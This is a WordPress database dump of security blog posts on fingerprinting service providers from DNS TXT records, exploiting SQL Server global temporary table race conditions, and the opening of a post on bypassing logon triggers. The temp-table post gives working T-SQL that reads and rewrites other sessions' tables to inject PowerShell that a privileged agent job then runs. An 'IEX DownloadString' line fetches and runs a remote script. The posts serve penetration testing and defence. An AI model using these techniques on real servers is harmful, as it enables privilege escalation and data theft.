  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation. Below are the top 5 categories:
 PLACE CATEGORY
1 Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
2 Certificate Authorities like globalsign were a close second.
3 Electronic Document Signing like Adobe sign and Docusign hang around third place.
4 Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
5 Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.
There are many other types of services that range from caching services like Cloudflare to security services like “Have I Been Pwned”, but the categories above seem to be the most ubiquitous. It’s also worth noting that I removed SPF records, because technically there are not domain validation tokens.  However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren’t managed well.  Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.
 COUNT PROVIDER CATEGORY EXAMPLE TOKEN
149785 gmail.com Cloud Services google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 microsoft office 365 Cloud Services ms=hash
16028 facebook.com Cloud Services facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 globalsign.com Certificate Authority _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 Adobe Enterprise Services Electronic Signing,Cloud Services adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 Amazon Simple Email Cloud Services amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 globalsign.com Certificate Authority globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO--GxX7laTgCizBTW
3486 atlassian services Collaboration atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 mailru- Cloud Services mailru-verification: fa868a61bb236ae5
2698 yandex.com Cloud Services yandex-verification=fb9a7e8303137b4c
2429 Pardot (Salesforce) Marketing and Analytics pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 docusign.com Electronic Signing docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 webex Collaboration webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 www.sendinblue.com Marketing and Analytics Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 zoho.com Email zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 dropbox.com Collaboration dropbox-domain-verification=zsp1beovavgv
675 webex.com Collaboration ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 Spiceworks.com Security workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 haveibeenpwned.com Security have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
577 citrix.com Collaboration citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 brave.com Collaboration brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 Adobe Sign / Document Cloud Electronic Signing adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 Firebase (Google) Development and Publishing firebase=solar-virtue-511
384 O365 Cloud Services mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 loader.io Security loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I've written a PowerShell function called "Resolve-DnsDomainValidationToken".  You can simply provide it domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created.  Currently it supports parameters for a single domain, a list of domains, or a list of URLs. Resolve-DnsDomainValidationToken can be downloaded HERE.

Command Example

To give you an idea of what the commands and output look like I've provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.
# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results
Domain Validation Token Fingerprint For those of you that don't like starring at the console, the results can also be viewed using Out-GridView.
# View record in the out-grid view
$Results | Out-GridView
Domain Validation Token Fingerprint Gridview Finally, the command also automatically creates two csv files that contain the results:
  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could fingerprinted.
Domain Validation Token Fingerprint Csv

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we've used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testers Use Cases

  1. Services that Support Federated Authentication without MFA This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company’s Active Directory deployment.  In many cases they aren’t configured with multi-factor authentication (MFA).  Common examples include Office 365, AWS, G Suite, and Github. Pro Tip: Once you’ve authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names.  You can do that with Karl’s Get-AzureDomainInfo.ps1 script.
  2. Subdomain Hijacking Targets The domain validation tokens could reveal services that support subdomain which can be attacked once the CNAME records go stale. For information on common techniques Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity When reviewing domain validation tokens for all of the domains owned by an organization it’s possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:
    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they user 3rd party marketing and analytics? If so who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certifications? How are they used?
    5. What mail protection services are they using? What are those default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example,
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and encrypted base64 values that could potentially be cracked offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest,  or internal audit.  Good luck and hack responsibly! [post_title] => Analyzing DNS TXT Records to Fingerprint Online Service Providers [post_excerpt] => In this blog I'll share a process/script that can be used to identify online service providers used by a target company through domain validation tokens stored in DNS TXT records. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => analyzing-dns-txt-records-to-fingerprint-service-providers [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:58:16 [post_modified_gmt] => 2021-06-08 21:58:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11219 [menu_order] => 423 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 11191 [post_author] => 17 [post_date] => 2019-11-11 07:00:58 [post_date_gmt] => 2019-11-11 07:00:58 [post_content] => SQL Server global temporary tables usually aren’t an area of focus during network and application penetration tests.  However, they are periodically used insecurely by developers to store sensitive data and code blocks that can be accessed by unprivileged users.  In this blog, I'll walk through how global temporary tables work, and share some techniques that we’ve used to identify and exploit them in real applications. If you don't want to read through everything you can jump ahead:

Lab Setup

  1. Install SQL Server. Most of the scenarios we’ll cover can be executed with SQL Server Express, but if you want to follow along with the case study you will need to use one of the commercial versions that supports agent jobs.
  2. Log into the SQL Server as a sysadmin.
  3. Create a least privilege login.
-- Create server login
CREATE LOGIN [basicuser] WITH PASSWORD = 'Password123!';
Img Create Login

What are Global Temporary Tables?

The are many ways to store data temporarily in SQL Server, but temporary tables seem to be one of the most popular methods. Based on what I’ve seen, there are three types of temporary tables commonly used by developers that include table variables, local temporary tables, and global temporary tables. Each has its pros, cons, and specialized use cases, but global temporary tables tend to create the most risk, because they can be read and modified by any SQL Server user.  As a result, using global temporary tables often results in race conditions that can be exploited by least privilege users to gain unauthorized access to data and privileges.

How do Temporary Tables Work?

In this section I’ve provided a primer that covers how to create the three types of temporary tables, where they’re stored, and who can access them. To get us started let’s sign into SQL Server using our sysadmin login and review each of the three types of temp tables. All of the temporary tables are stored in the tempdb database and can be listed using the query below.
SELECT *
FROM tempdb.sys.objects
WHERE name like '#%';
All users in SQL Server can execute the query above, but the access users have to the tables displayed depends largely on  the table type and scope. Below is a summary of the scope for each type of temporary table. Img Types Of Temp Tables With that foundation in place, let’s walk through some TSQL exercises to help better understand each of those scope boundaries.

Exercise 1: Table Variables

Table variables are limited to a single query batch within the current user’s active session.  They’re not accessible to other query batches, or to other active user sessions. As a result, it’s not very likely that data would be leaked to unprivileged users. Below is an example of referencing a table variable in the same batch.
-- Create table variable
If not Exists (SELECT name FROM tempdb.sys.objects WHERE name = 'table_variable')
DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records into table variable
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')

-- Query table variable in same batch 
SELECT * 
FROM @table_variable
GO
Img Table Variable Same Batch We can see from the image above that we are able to query the table variable within the same batch query.  However, when we separate the table creation and table data selection into two batches using “GO”, we can see that the table variable is no longer accessible outside of its original batch job.  Below is an example. Img Table Variable Diff Batch Hopefully that helps illustrate the scope limitations of table variables, but you might still be wondering how they’re stored.  When you create a table variable it’s stored in tempdb using a name starting with a “#” and randomly generated characters.  The query below can be used to filter for table variables being used.
SELECT * 
FROM tempdb.sys.objects  
WHERE name not like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1

Exercise 2: Local Temporary Tables

Like table variables, local temporary tables are limited to the current user’s active session, but they are not limited to a single batch. For that reason, they offer more flexibility than table variables, but still don’t increase the risk of unintended data exposure, because other active user sessions can’t access them.  Below is a basic example showing how to create and access local temporary tables across different query batches within the same session.
-- Create local temporary table
IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NULL)
CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records local temporary table
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query local temporary table
SELECT * 
FROM #LocalTempTbl
GO
Img Local Temp Table As you can see from the image above, the table data can still be accessed across multiple query batches.  Similar to table variables, all custom local temporary tables need to start with a “#”.  Other than you can name them whatever you want.  They are also stored in the tempdb database, but SQL Server will append some additional information to the end of your table name so access can be constrained to your session.  Let’s see what our new table “#LocalTempTbl” looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE name like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1
</code
Img Local Temp Table Above we can see the table we created named “#LocalTempTbl”, had some of the additional session information appended to it.  All users can see the that temp table name, but only the session that created it can access its contents.  It appears that the session id appended to the end increments with each session made to the server, and you can actually use the full name to query that table from with your session.  Below is an example.
SELECT * 
FROM tempdb..[ #LocalTempTbl_______________________________________________________________________________________________________000000000007]
</code
Img Local Temp Table However, if you attempt to access that temp table from another user’s session you get the follow error. Img Local Temp Table Regardless, when you’re all done with the local temporary table it can be removed by terminating your session or explicitly dropping it using the example command below.
DROP TABLE #LocalTempTbl

Exercise 3: Global Temporary Tables

Ready to level up? Similar to local temporary tables you can create and access global temporary tables from separate batched queries. The big difference is that ALL active user sessions can view and modify global temporary tables.  Let’s take a look at a basic example below.
-- Create global temporary table
IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL)
CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records global temporary table
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query global temporary table
SELECT * 
FROM ##GlobalTempTbl
GO
Img Global Temp Table Above we can see that we are able to query the global temporary table across different query batches. All custom global temporary tables need to start with “##”.  Other than you can name them whatever you want.  They are also stored in the tempdb database.  Let’s see what our new table “##GlobalTempTbl” looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE (select len(name) - len(replace(name,'#',''))) > 1
</code
Img Global Temp Table You can see that SQL Server doesn’t append any session related data to the table name like it does with local temporary tables, because it’s intended to be used by all sessions. Let’s sign into another session using the “basicuser” login we created to show that’s possible. Img Global Temp Table As you can see, if that global temporary table contains sensitive data it’s now exposed to all of the SQL Server users.

How do I Find Vulnerable Global Temporary Tables?

It’s easy to target Global Temp Tables when you know the table name, but most auditors and attackers won’t know where the bodies are buried.  So, in this section I’ll cover a few ways you can blindly locate potentially exploitable global temporary tables.
  • Review Source Code if you’re a privileged user.
  • Monitor Global Temporary Tables if you’re an unprivileged user.

Review Source Code

If you’re logged into SQL Server as a sysadmin or a user with other privileged roles, you can directly query the TSQL source code of agent jobs, store procedures, functions, and triggers for each database. You should be able to filter the query results for the string “##” to identify the use of global temporary table usage in the TSQL. With the filtered list in hand, you should be able to review the relevant TSQL source code and determine under which conditions the global temporary tables are vulnerable to attack. Below are some links to TSQL query templates to get you started: It’s worth noting that PowerUpSQL also supports functions that can be used to query for that information. Those functions include:
  • Get-SQLAgentJob Get-SQLStoredProcedure
  • Get-SQLTriggerDdl
  • Get-SQLTriggerDml
It would be nice if we could always just view the source code, but the reality is that most attackers won’t have sysadmin privileges out of the gate.  So, when you find you self in that position it’s time to change your approach.

Monitor Global Temporary Tables

Now let’s talk about blindly identifying global temporary tables from a least privilege perspective.  In the previous sections, we showed how to list temporary table names and query their contents. However, we didn’t have easy insight into the columns.  So below I’ve extended the original query to include that information.
-- List global temp tables, columns, and column types
SELECT t1.name as 'Table_Name',
       t2.name as 'Column_Name',
       t3.name as 'Column_Type',
       t1.create_date,
       t1.modify_date,
       t1.parent_object_id       
FROM tempdb.sys.objects AS t1
JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
If you didn’t DROP “##GlobalTempTbl”, then you should see something similar to the results below when you execute the query. Img Global Temp Table Running the query above provides insight into the global temporary tables being used at that moment, but it doesn’t help us monitor for their use over time.  Remember, temporary tables are commonly only used for a short period of time, so you don’t want to miss them. The query below is a variation of the first query, but will provide a list of global temporary tables every second.  The delay can be changed by modifying the “WAITFOR” statement, but be careful not to overwhelm the server.  If you’re not sure what you’re doing, then this technique should only be practiced in non-production environments.
-- Loop
While 1=1
BEGIN
    SELECT t1.name as 'Table_Name',
           t2.name as 'Column_Name',
           t3.name as 'Column_Type',
           t1.create_date,
           t1.modify_date,
           t1.parent_object_id       
    FROM tempdb.sys.objects AS t1
    JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
    JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
    WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1

    -- Set delay
    WaitFor Delay '00:00:01'
END
Img Global Temp Table As you can see, the query will provide a list of table names and columns that we can use in future attacks, but we may also want to monitor the contents of the global temporary tables to understand what our options are. Below is an example, but remember to use “WAITFOR” to throttle your monitoring when possible.
-- Monitor contents of all Global Temp Tables 
-- Loop
WHILE 1=1
BEGIN
    -- Add delay if required
    WAITFOR DELAY '0:0:1'
    
    -- Setup variables
    DECLARE @mytempname varchar(max)
    DECLARE @psmyscript varchar(max)

    -- Iterate through all global temp tables 
    DECLARE MY_CURSOR CURSOR 
        FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
    OPEN MY_CURSOR
    FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    WHILE @@FETCH_STATUS = 0
    BEGIN 

        -- Print table name
        PRINT @mytempname 

        -- Select table contents
        DECLARE @myname varchar(max)
        SET @myname = 'SELECT * FROM [' + @mytempname + ']'
        EXEC(@myname)

        -- Next record
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    END
    CLOSE MY_CURSOR
    DEALLOCATE MY_CURSOR
END
Img Global Temp Table As you can see, the query above will monitor for global temp tables and display their contents.  That technique is a great way to blindly dump potentially sensitive information from global temporary tables, even if they only exist for a moment.  However, sometimes you may want to modify the contents of the global temp tables too.  We already know the table and column names. So, it’s pretty straight forward to monitor for global temp tables being created and update their contents.  Below is an example.
-- Loop forever
WHILE 1=1 
BEGIN    
    -- Select table contents
    SELECT * FROM ##GlobalTempTbl

    -- Update global temp table contents
    DECLARE @mycommand varchar(max)
    SET @mycommand = 'UPDATE t1 SET t1.SpyName = ''Inspector Gadget'' FROM ##GlobalTempTbl  t1'        
    EXEC(@mycommand)    
END
Img Global Temp Table As you can see, the table was updated. However, you might still be wondering, “Why would I want to change the contents of the temp table?”.  To help illustrate the value of the technique I’ve put together a short case study in the next section.

Case Study: Attacking a Vulnerable Agent Job

Now for some real fun.  Below we’ll walk through the vulnerable agent job’s TSQL code and I’ll highlight where the global temporary tables are being used insecurely.  Then we’ll exploit the flaw using the previously discussed techniques. To get things started, download and run this TSQL script as a sysadmin to configure the vulnerable agent jobs on the SQL Server instance.

Vulnerable Agent Job Walkthrough

The agent will execute the TSQL job every minute and perform the following process:
  1. The job generates an output file path for the PowerShell script that will be executed later.
    -- Set filename for PowerShell script
    Set @PsFileName = ''MyPowerShellScript.ps1''
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY(''ErrorLogFileName'')) as VARCHAR(MAX)),''ERRORLOG'','''')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
  2. The job creates a string variable called “@MyPowerShellCode” to store the PowerShell script. The PowerShell code simply creates the file “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogintendedoutput.txt" and contains the string “hello world”.
    -- Define the PowerShell code
    SET @MyPowerShellCode = ''Write-Output "hello world" | Out-File "'' +  @TargetDirectory + ''intendedoutput.txt"''
    Pro Tip: The SQL Server and agent service accounts always have write access to the log folder of the SQL Server installation. Sometimes it can come in handy during offensive operations. You can find the log folder with the query below:
    SELECT SERVERPROPERTY('InstanceDefaultLogPath')
  3. The “@MyPowerShellCode” variable that contains the PowerShell code is then inserted into a randomly named Global Temporary Table. This is where it all starts to go wrong for the developer, because the second that table is created any user can view and modify it.
    -- Create a global temp table with a unique name using dynamic SQL 
    SELECT  @MyGlobalTempTable =  ''##temp'' + CONVERT(VARCHAR(12), CONVERT(INT, RAND() * 1000000))
    
    -- Create a command to insert the PowerShell code stored in the @MyPowerShellCode variable, into the global temp table
    SELECT  @Command = ''
            CREATE TABLE ['' + @MyGlobalTempTable + ''](MyID int identity(1,1), PsCode varchar(MAX)) 
            INSERT INTO  ['' + @MyGlobalTempTable + ''](PsCode) 
            SELECT @MyPowerShellCode''
    
    -- Execute that command 
    EXECUTE sp_ExecuteSQL @command, N''@MyPowerShellCode varchar(MAX)'', @MyPowerShellCode
  4. Xp_cmdshell is then used to execute bcp on the operating system. Bcp is a backup utility that ships with SQL Server.  In this case, it’s being used to connect to the SQL Server instance as the SQL Server service account, select the PowerShell code from the Global Temporary Table, and write the PowerShell code to the file path defined in step 1.
    -- Execute bcp via xp_cmdshell (as the service account) to save the contents of the temp table to MyPowerShellScript.ps1
    SELECT @Command = ''bcp "SELECT PsCode from ['' + @MyGlobalTempTable + '']'' + ''" queryout "''+ @PsFilePath + ''" -c -T -S '' + @@SERVERNAME-- Write the file
    EXECUTE MASTER..xp_cmdshell @command, NO_OUTPUT
  5. Next, xp_cmdshell is used again to execute the PowerShell script that was just written to disk.
    -- Run the PowerShell script
    DECLARE @runcmdps nvarchar(4000)
    SET @runcmdps = ''Powershell -C "$x = gc ''''''+ @PsFilePath + '''''';iex($X)"''
    EXECUTE MASTER..xp_cmdshell @runcmdps, NO_OUTPUT
  6. Finally, xp_cmdshell is used one last time to remove the PowerShell script.
    -- Delete the PowerShell script
    DECLARE @runcmddel nvarchar(4000)
    SET @runcmddel= ''DEL /Q "'' + @PsFilePath +''"''
    EXECUTE MASTER..xp_cmdshell @runcmddel, NO_OUTPUT

Vulnerable Agent Job Attack

Now that our vulnerable agent job is running in the background, let’s log in using our least privilege user “basicuser” to conduct our attack. Below is a summary of the attack.
  1. First, let’s see if we can discover the global temporary name using our monitoring query from earlier. This monitoring script is throttled. I do not recommend removing the throttle in production, it tends to consume a lot of CPU, and that will set off alarms, because DBAs tend to monitor the performance of their production servers pretty closely. You're much more likely to get a caught causing 80% utilization on the server than you are when executing xp_cmdshell.
    -- Loop
    While 1=1
    BEGIN
        SELECT t1.name as 'Table_Name',
               t2.name as 'Column_Name',
               t3.name as 'Column_Type',
               t1.create_date,
               t1.modify_date,
               t1.parent_object_id       
        FROM tempdb.sys.objects AS t1
        JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
        JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
        WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
    
        -- Set delay
        WAITFOR DELAY '00:00:01'
    END
    The job takes a minute to run so you may have to wait 59 seconds (or you can manually for the job to execute in the lab), but eventually you should see something similar to the output below. Img Case Study Gtt
  2. In this this example, the table name “##temp800845” looks random, so we try monitoring again and get the table name “##103919”. It has a different name, but it has the same columns.  That’s enough information to get us moving in the right direction. Img Case Study Gtt
  3. Next, we want to take a look at the contents of the global temporary table before it gets removed. However, we don’t know what the table name will be.  To work around that constraint, the query below will display the contents of every global temporary table.
    -- Monitor contents of all Global Temp Tables 
    -- Loop
    While 1=1
    BEGIN
        -- Add delay if required
        WAITFOR DELAY '00:00:01'
        
        -- Setup variables
        DECLARE @mytempname varchar(max)
        DECLARE @psmyscript varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN 
    
            -- Print table name
            PRINT @mytempname 
    
            -- Select table contents
            DECLARE @myname varchar(max)
            SET @myname = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@myname)
    
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END
    Img Case Study Gtt A From here we can see that the global temporary table is actually housing PowerShell code. From that, we can guess that it’s being executed at some point down the line. So, the next step is to modify the PowerShell code before it gets executed.
  4. Once again, we don’t know what the table name is going to be, but we do know the column names. So can we modify our query from step 3, and UPDATE the contents of the global temporary table rather than simply selecting it's contents. In this case, we’ll be changing the output path defined in the code from “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogintendedoutput.txt” to “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogfinishline.txt”.  However, you could replace the code with your favorite PowerShell shellcode runner or whatever arbitrary commands bring sunshine into your day.
    -- Create variables
    DECLARE @PsFileName NVARCHAR(4000)
    DECLARE @TargetDirectory NVARCHAR(4000)
    DECLARE @PsFilePath NVARCHAR(4000)
    
    -- Set filename for PowerShell script
    Set @PsFileName = 'finishline.txt'
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY('ErrorLogFileName')) as VARCHAR(MAX)),'ERRORLOG','')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
    
    -- Loop forever 
    WHILE 1=1 
    BEGIN    
        -- Set delay
        WAITFOR DELAY '0:0:1'
    
        -- Setup variables
        DECLARE @mytempname varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN         
            -- Print table name
            PRINT @mytempname 
        
            -- Update contents of known column with ps script in an unknown temp table    
            DECLARE @mycommand varchar(max)
            SET @mycommand = 'UPDATE t1 SET t1.PSCode = ''Write-Output "hello world" | Out-File "' + @PsFilePath + '"'' FROM ' + @mytempname + '  t1'
            EXEC(@mycommand)    
    
            -- Select table contents
            DECLARE @mycommand2 varchar(max)
            SET @mycommand2 = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@mycommand2)
        
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname  
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END
    Img Case Study Gtt As you can see from the screenshot above, we were able to update the temporary table contents with our custom PowerShell code. To confirm that we beat the race condition, verify that the “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogfinishline.txt” file was created. Note: You're path may be different if you’re using a different version of SQL Server.Img Case Study Gtt
Tada! In summary, we leveraged the insecure use of global temporary tables in a TSQL agent job to escalate privileges from a least privilege SQL Server login to the Windows operating system account running the SQL Server agent service.

What can I do about it?

Below are some basic recommendations based on a little research, but please reach out if you have any thoughts.  I would love to hear how other folks are tackling this one.

Prevention

  1. Don’t run code blocks that have been stored in a global temporary table.
  2. Don’t store sensitive data or code blocks in a global temporary table.
  3. If you need to access data across multiple sessions consider using memory-optimized tables. Based on my lab testing, they can provide similar performance benefits without having to expose data to unprivileged users. For more information check out this article from Microsoft.

Detection

At the moment, I don’t have a great way to monitor for potentially malicious global temporary table access.  However, if an attacker is monitoring global temporary tables too aggressively the CPU should spike and you’ll likely see their activity in the list of expensive queries.  From there, you should be able to track down the offending user using the session_id and a query similar to:
SELECT 
    status,
    session_id,
    login_time,
    last_request_start_time,
    security_id,
    login_name,
    original_login_name
FROM [sys].[dm_exec_sessions]

Wrap Up

In summary, using global temporary tables results in race conditions that can be exploited by least privilege users to read and modify the associated data. Depending on how that data is being used it can have some pretty big security implications.  Hopefully the information is useful to the builders and breakers out there trying to make things better. Either way, have fun and hack responsibility.

References

[post_title] => Exploiting SQL Server Global Temporary Table Race Conditions [post_excerpt] => This blog will walk through how to find and exploit SQL Server global temporary table race conditions to gain unauthorized access to data and execute code. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exploiting-sql-server-global-temporary-table-race-conditions [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:57:59 [post_modified_gmt] => 2021-06-08 21:57:59 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11191 [menu_order] => 424 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [29] => WP_Post Object ( [ID] => 9216 [post_author] => 17 [post_date] => 2018-06-27 07:00:15 [post_date_gmt] => 2018-06-27 07:00:15 [post_content] => It's pretty common for us to perform application penetration testing against two-tier desktop applications that connect directly to SQL Server databases. Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I'll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties. The examples will include SSMS and PowerUpSQL. This should be useful to application penetration testers and developers who may have inherited a legacy desktop application. This blog has been organized into the sections below, feel free to jump ahead.

What's a Logon Trigger?

A logon trigger is essentially a stored procedure that executes after successfully authenticating to SQL Server, but before the logon session is fully established. They are commonly used to programmatically restrict access to SQL Server based on time of day, hostnames, application names, and number of concurrent sessions by a single user.

Installing SQL Server

If you don't already have SQL Server installed and want to follow along, below are a few resources to get you started.
  1. Download and install SQL Server from here.
  2. Download and install SQL Server Management Studio Express (SSMS) from here.

Creating a Logon Trigger to Restrict Hostnames

Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting workstation name.
  1. Log into your new SQL Server instance as a sysadmin using SSMS.
